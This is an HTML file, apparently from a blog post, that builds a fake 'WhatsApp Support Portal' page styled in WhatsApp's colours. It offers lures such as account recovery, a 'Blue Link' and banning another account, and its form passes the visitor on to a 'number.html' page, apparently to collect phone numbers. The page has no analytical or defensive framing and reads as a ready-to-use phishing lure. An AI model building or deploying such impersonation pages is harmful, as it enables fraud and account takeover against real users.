nano index.html
<!DOCTYPE html>
<html>
<head>
<title>WhatsApp Support</title>
<style>
body {
font-family: Arial, sans-serif;
background-color: #ECE5DD;
color: #075E54;
text-align: center;
padding-top: 50px;
}
h2 {
font-size: 28px;
}
.option {
background: #fff;
margin: 15px auto;
padding: 15px;
width: 80%;
border-radius: 10px;
font-size: 18px;
box-shadow: 0 0 10px #ccc;
}
button {
padding: 10px 20px;
background: #25D366;
color: white;
border: none;
border-radius: 5px;
font-size: 16px;
margin-top: 20px;
}
</style>
</head>
<body>
<h2>WhatsApp Support Portal</h2>
<form action="number.html" method="get">
<div class="option"><input type="radio" name="opt"> Recover Your Data</div>
<div class="option"><input type="radio" name="opt"> Secure Your WhatsApp</div>
<div class="option"><input type="radio" name="opt"> Get WhatsApp Blue Link</div>
<div class="option"><input type="radio" name="opt"> Recover WhatsApp Account</div>
<div class="option"><input type="radio" name="opt"> Ban WhatsApp Account</div>
<button type="submit">Next</button>
</form>
</body>
</html>
Comments
Post a Comment